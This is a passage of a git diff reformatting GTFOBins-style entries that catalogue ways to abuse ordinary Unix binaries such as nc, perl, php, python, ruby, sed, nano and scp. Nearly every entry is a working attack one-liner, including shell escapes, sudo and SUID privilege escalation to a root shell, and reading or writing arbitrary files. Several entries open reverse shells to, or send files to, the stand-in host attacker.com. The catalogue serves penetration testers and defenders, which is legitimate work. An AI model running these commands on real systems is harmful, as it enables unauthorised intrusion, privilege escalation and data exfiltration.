--eval=$'x:\n\t-'"$COMMAND" + - code: | + COMMAND='/bin/sh' + sudo make -s --eval=$'x:\n\t-'"$COMMAND" --- diff --git a/_gtfobins/man.md b/_gtfobins/man.md index 8ccabe2..c93bb1c 100644 --- a/_gtfobins/man.md +++ b/_gtfobins/man.md @@ -1,19 +1,17 @@ --- functions: execute-interactive: - - code: | - man man - !/bin/sh + - code: | + man man + !/bin/sh file-read: - - code: 'man file_to_read - -' + - code: man file_to_read sudo-enabled: - - code: | - sudo man man - !/bin/sh + - code: | + sudo man man + !/bin/sh suid-limited: - - code: | - ./man man - !/bin/sh + - code: | + ./man man + !/bin/sh --- diff --git a/_gtfobins/more.md b/_gtfobins/more.md index 823fa04..8605381 100644 --- a/_gtfobins/more.md +++ b/_gtfobins/more.md @@ -1,17 +1,15 @@ --- functions: execute-interactive: - - code: | - TERM= more /etc/profile - !/bin/sh + - code: | + TERM= more /etc/profile + !/bin/sh file-read: - - code: 'more file_to_read - -' + - code: more file_to_read suid-enabled: - - code: "./more file_to_read\n" + - code: "./more file_to_read\n" sudo-enabled: - - code: | - TERM= sudo -E more /etc/profile - !/bin/sh + - code: | + TERM= sudo -E more /etc/profile + !/bin/sh --- diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md index 104e35e..1af15a4 100644 --- a/_gtfobins/mount.md +++ b/_gtfobins/mount.md @@ -1,8 +1,8 @@ --- functions: sudo-enabled: - - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. - code: | - sudo mount -o bind /bin/sh /bin/mount - sudo mount + - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. + code: | + sudo mount -o bind /bin/sh /bin/mount + sudo mount --- diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md index d45f451..6e0d586 100644 --- a/_gtfobins/nano.md +++ b/_gtfobins/nano.md @@ -1,38 +1,36 @@ --- functions: execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - nano -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + nano -s $TF /etc/hosts + ^T file-write: - - code: | - nano file_to_write - ^O + - code: | + nano file_to_write + ^O file-read: - - code: 'nano file_to_read - -' + - code: nano file_to_read suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF - chmod +x $TF - ./nano -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./nano -s $TF /etc/hosts + ^T sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - sudo nano -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo nano -s $TF /etc/hosts + ^T --- diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index b285423..39dad06 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -1,29 +1,27 @@ --- functions: reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - nc -e /bin/sh $RHOST $RPORT + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + nc -e /bin/sh $RHOST $RPORT bind-shell-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - LPORT=12345 - nc -l -p $LPORT -e /bin/sh + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + nc -l -p $LPORT -e /bin/sh upload: - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - on the attacker box to collect the file. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - nc $RHOST $RPORT < "$LFILE" + - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + nc $RHOST $RPORT < "$LFILE" download: - - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 - < "file_to_send"` on the attacker box to send the file. - code: | - LPORT=12345 - LFILE=file_to_save - nc -l -p $LPORT > "$LFILE" + - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. + code: | + LPORT=12345 + LFILE=file_to_save + nc -l -p $LPORT > "$LFILE" --- diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md index 4d57bd2..c612274 100644 --- a/_gtfobins/nl.md +++ b/_gtfobins/nl.md @@ -1,19 +1,16 @@ --- -description: 'The read file content is corrupted by a leading space added to each - line. - -' +description: The read file content is corrupted by a leading space added to each line. functions: file-read: - - code: | - LFILE=file_to_read - nl -bn -w1 -s '' $LFILE + - code: | + LFILE=file_to_read + nl -bn -w1 -s '' $LFILE suid-enabled: - - code: | - LFILE=file_to_read - ./nl -bn -w1 -s '' $LFILE + - code: | + LFILE=file_to_read + ./nl -bn -w1 -s '' $LFILE sudo-enabled: - - code: | - LFILE=file_to_read - sudo nl -bn -w1 -s '' $LFILE + - code: | + LFILE=file_to_read + sudo nl -bn -w1 -s '' $LFILE --- diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 214c045..622f2bf 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -1,38 +1,33 @@ --- functions: execute-interactive: - - code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'' - -' + - code: | + node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - node -e 'sh = require("child_process").spawn("/bin/sh"); - net.connect(process.env.RPORT, process.env.RHOST, function () { - this.pipe(sh.stdin); - sh.stdout.pipe(this); - sh.stderr.pipe(this); - });' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + node -e 'sh = require("child_process").spawn("/bin/sh"); + net.connect(process.env.RPORT, process.env.RHOST, function () { + this.pipe(sh.stdin); + sh.stdout.pipe(this); + sh.stderr.pipe(this); + });' bind-shell-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - export LPORT=12345 - node -e 'sh = require("child_process").spawn("/bin/sh"); - require("net").createServer(function (client) { - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - }).listen(process.env.LPORT);' + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + export LPORT=12345 + node -e 'sh = require("child_process").spawn("/bin/sh"); + require("net").createServer(function (client) { + client.pipe(sh.stdin); + sh.stdout.pipe(client); + sh.stderr.pipe(client); + }).listen(process.env.LPORT);' suid-enabled: - - code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, - 1, 2]});'' - -' + - code: | + ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' sudo-enabled: - - code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, - 2]});'' - -' + - code: | + sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' --- diff --git a/_gtfobins/od.md b/_gtfobins/od.md index 8644d85..4a82e45 100644 --- a/_gtfobins/od.md +++ b/_gtfobins/od.md @@ -1,18 +1,16 @@ --- -description: | - Three spaces are added before each character in the read file, and - non-printable chars are printed as backslash escape sequences. +description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences. functions: file-read: - - code: | - LFILE=file_to_read - od -An -c -w9999 "$LFILE" + - code: | + LFILE=file_to_read + od -An -c -w9999 "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./od -An -c -w9999 "$LFILE" + - code: | + LFILE=file_to_read + ./od -An -c -w9999 "$LFILE" sudo-enabled: - - code: | - LFILE=file_to_read - sudo od -An -c -w9999 "$LFILE" + - code: | + LFILE=file_to_read + sudo od -An -c -w9999 "$LFILE" --- diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index f781b65..d3c0e0f 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -1,15 +1,15 @@ --- functions: execute-interactive: - - code: perl -e 'exec "/bin/sh";' + - code: perl -e 'exec "/bin/sh";' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' suid-enabled: - - code: ./perl -e 'exec "/bin/sh";' + - code: ./perl -e 'exec "/bin/sh";' sudo-enabled: - - code: sudo perl -e 'exec "/bin/sh";' + - code: sudo perl -e 'exec "/bin/sh";' --- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index ca9e4ea..05f41ea 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -1,50 +1,49 @@ --- functions: execute-interactive: - - code: | - export CMD="/bin/sh" - php -r 'system(getenv("CMD"));' - - code: | - export CMD="/bin/sh" - php -r 'passthru(getenv("CMD"));' - - code: | - export CMD="/bin/sh" - php -r 'print(shell_exec(getenv("CMD")));' - - code: | - export CMD="/bin/sh" - php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));' - - code: | - export CMD="/bin/sh" - php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' + - code: | + export CMD="/bin/sh" + php -r 'system(getenv("CMD"));' + - code: | + export CMD="/bin/sh" + php -r 'passthru(getenv("CMD"));' + - code: | + export CMD="/bin/sh" + php -r 'print(shell_exec(getenv("CMD")));' + - code: | + export CMD="/bin/sh" + php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));' + - code: | + export CMD="/bin/sh" + php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' execute-non-interactive: - - code: | - export CMD="id" - php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' + - code: | + export CMD="id" + php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' upload: - - description: Serve files in the local folder running an HTTP server. This requires - PHP version 5.4 or later. - code: | - LHOST=0.0.0.0 - LPORT=8888 - php -S $LHOST:$LPORT + - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. + code: | + LHOST=0.0.0.0 + LPORT=8888 + php -S $LHOST:$LPORT download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' suid-enabled: - - code: | - CMD="/bin/sh" - ./php -r "system('$CMD');" + - code: | + CMD="/bin/sh" + ./php -r "system('$CMD');" sudo-enabled: - - code: | - CMD="/bin/sh" - sudo php -r "system('$CMD');" + - code: | + CMD="/bin/sh" + sudo php -r "system('$CMD');" --- diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md index c64f482..b9562e8 100644 --- a/_gtfobins/pico.md +++ b/_gtfobins/pico.md @@ -1,38 +1,36 @@ --- functions: execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - pico -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + pico -s $TF /etc/hosts + ^T file-write: - - code: | - pico file_to_write - ^O + - code: | + pico file_to_write + ^O file-read: - - code: 'pico file_to_read - -' + - code: pico file_to_read suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF - chmod +x $TF - ./pico -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./pico -s $TF /etc/hosts + ^T sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - sudo pico -s $TF /etc/hosts - ^T + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo pico -s $TF /etc/hosts + ^T --- diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md index a4ae2d9..868bf80 100644 --- a/_gtfobins/puppet.md +++ b/_gtfobins/puppet.md @@ -1,24 +1,23 @@ --- functions: execute-non-interactive: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - puppet apply -e "exec { '$CMD': logoutput => true }" + - description: The executed command output shown in the puppet log format. + code: | + export CMD="/usr/bin/id" + puppet apply -e "exec { '$CMD': logoutput => true }" file-write: - - description: The file path must be absolute. - code: | - export LFILE="/tmp/file_to_write" - puppet apply -e "file { '$LFILE': content => 'data' }" + - description: The file path must be absolute. + code: | + export LFILE="/tmp/file_to_write" + puppet apply -e "file { '$LFILE': content => 'data' }" file-read: - - description: The read file content is corrupted by the `diff` output format. The - actual `/usr/bin/diff` command is executed. - code: | - export LFILE=file_to_read - puppet filebucket -l diff /dev/null $LFILE + - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed. + code: | + export LFILE=file_to_read + puppet filebucket -l diff /dev/null $LFILE sudo-enabled: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - sudo puppet apply -e "exec { '$CMD': logoutput => true }" + - description: The executed command output shown in the puppet log format. + code: | + export CMD="/usr/bin/id" + sudo puppet apply -e "exec { '$CMD': logoutput => true }" --- diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index f2cce96..6f7aa79 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -1,39 +1,37 @@ --- functions: execute-interactive: - - code: python2 -c 'import os; os.system("/bin/sh")' + - code: python2 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on - the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an - HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' - - description: Serve files in the local folder running an HTTP server. - code: | - export LPORT=8888 - python2 -m SimpleHTTPServer $LPORT + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + python2 -m SimpleHTTPServer $LPORT download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' file-write: - - code: python2 -c 'open("file_to_write","w+").write("data")' + - code: python2 -c 'open("file_to_write","w+").write("data")' file-read: - - code: python2 -c 'open("file_to_read").read()' + - code: python2 -c 'open("file_to_read").read()' load-library: - - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' suid-enabled: - - code: ./python2 -c 'import os; os.system("/bin/sh -p")' + - code: ./python2 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - - code: sudo python2 -c 'import os; os.system("/bin/sh")' + - code: sudo python2 -c 'import os; os.system("/bin/sh")' --- diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 719151a..469a231 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -1,39 +1,37 @@ --- functions: execute-interactive: - - code: python3 -c 'import os; os.system("/bin/sh")' + - code: python3 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on - the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an - HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' - - description: Serve files in the local folder running an HTTP server. - code: | - LPORT=8888 - python3 -m http.server $LPORT + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' + - description: Serve files in the local folder running an HTTP server. + code: | + LPORT=8888 + python3 -m http.server $LPORT download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' file-write: - - code: python3 -c 'open("file_to_write","w+").write("data")' + - code: python3 -c 'open("file_to_write","w+").write("data")' file-read: - - code: python3 -c 'open("file_to_read").read()' + - code: python3 -c 'open("file_to_read").read()' load-library: - - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' suid-enabled: - - code: ./python3 -c 'import os; os.system("/bin/sh -p")' + - code: ./python3 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - - code: sudo python3 -c 'import os; os.system("/bin/sh")' + - code: sudo python3 -c 'import os; os.system("/bin/sh")' --- diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md index 254f12d..fd3b8a6 100644 --- a/_gtfobins/rlwrap.md +++ b/_gtfobins/rlwrap.md @@ -1,15 +1,14 @@ --- functions: execute-interactive: - - code: rlwrap /bin/sh + - code: rlwrap /bin/sh file-write: - - description: This adds timestamps to the output file. This relies on the external - `echo` command. - code: | - LFILE=file_to_write - rlwrap -l "$LFILE" echo data + - description: This adds timestamps to the output file. This relies on the external `echo` command. + code: | + LFILE=file_to_write + rlwrap -l "$LFILE" echo data suid-enabled: - - code: "./rlwrap -H /dev/null /bin/sh -p" + - code: ./rlwrap -H /dev/null /bin/sh -p sudo-enabled: - - code: sudo rlwrap /bin/sh + - code: sudo rlwrap /bin/sh --- diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 268c69f..e852209 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' + - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' + - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' sudo-enabled: - - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md index ce85849..9ec5af8 100644 --- a/_gtfobins/rpmquery.md +++ b/_gtfobins/rpmquery.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' + - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' + - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' sudo-enabled: - - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' + - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 1039257..e24cc96 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -1,33 +1,32 @@ --- functions: execute-interactive: - - code: ruby -e 'exec "/bin/sh"' + - code: ruby -e 'exec "/bin/sh"' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' upload: - - description: Serve files in the local folder running an HTTP server. This requires - version 1.9.2 or later. - code: | - export LPORT=8888 - ruby -run -e httpd . -p $LPORT + - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later. + code: | + export LPORT=8888 + ruby -run -e httpd . -p $LPORT download: - - description: Fetch a remote file via HTTP GET request. - code: | - export RHOST=attacker.com - export RPORT=12345 - export RFILE=/file_to_get - export LFILE=file_to_save - ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export RFILE=/file_to_get + export LFILE=file_to_save + ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' file-write: - - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' + - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' file-read: - - code: ruby -e 'puts File.read("file_to_read")' + - code: ruby -e 'puts File.read("file_to_read")' load-library: - - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' + - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' sudo-enabled: - - code: sudo ruby -e 'exec "/bin/sh"' + - code: sudo ruby -e 'exec "/bin/sh"' --- diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md index 711cf53..832fe00 100644 --- a/_gtfobins/scp.md +++ b/_gtfobins/scp.md @@ -1,36 +1,36 @@ --- functions: execute-non-interactive: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - scp -S $TF x y: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + scp -S $TF x y: upload: - - description: Send local file to a SSH server. - code: | - RPATH=user@attacker.com:~/file_to_save - LPATH=file_to_send - scp $LFILE $RPATH + - description: Send local file to a SSH server. + code: | + RPATH=user@attacker.com:~/file_to_save + LPATH=file_to_send + scp $LFILE $RPATH download: - - description: Fetch a remote file from a SSH server. - code: | - RPATH=user@attacker.com:~/file_to_get - LFILE=file_to_save - scp $RPATH $LFILE + - description: Fetch a remote file from a SSH server. + code: | + RPATH=user@attacker.com:~/file_to_get + LFILE=file_to_save + scp $RPATH $LFILE sudo-enabled: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - sudo scp -S $TF x y: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + sudo scp -S $TF x y: suid-limited: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - ./scp -S $TF a b: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + ./scp -S $TF a b: --- diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index 0cd0df4..987e56e 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -1,24 +1,24 @@ --- functions: execute-interactive: - - description: GNU version only. Also, this requires `bash`. - code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + - description: GNU version only. Also, this requires `bash`. + code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts execute-non-interactive: - - description: GNU version only. - code: sed -n "1e id" /etc/hosts + - description: GNU version only. + code: sed -n "1e id" /etc/hosts file-write: - - code: | - LFILE=file_to_write - sed -n "1s/.*/data/w $LFILE" /etc/hosts + - code: | + LFILE=file_to_write + sed -n "1s/.*/data/w $LFILE" /etc/hosts file-read: - - code: | - LFILE=file_to_read - sed '' "$LFILE" + - code: | + LFILE=file_to_read + sed '' "$LFILE" suid-enabled: - - code: | - LFILE=file_to_read - ./sed -e '' "$LFILE" + - code: | + LFILE=file_to_read + ./sed -e '' "$LFILE" sudo-enabled: - - description: GNU version only. Also, this requires `bash`. - code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + - description: GNU version only. Also, this requires `bash`. + code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts --- diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md index cdc0aed..50ce9b2 100644 --- a/_gtfobins/setarch.md +++ b/_gtfobins/setarch.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: setarch $(arch) /bin/sh + - code: setarch $(arch) /bin/sh suid-enabled: - - code: "./setarch $(arch) /bin/sh -p" + - code: ./setarch $(arch) /bin/sh -p sudo-enabled: - - code: sudo setarch $(arch) /bin/sh + - code: sudo setarch $(arch) /bin/sh --- diff --git 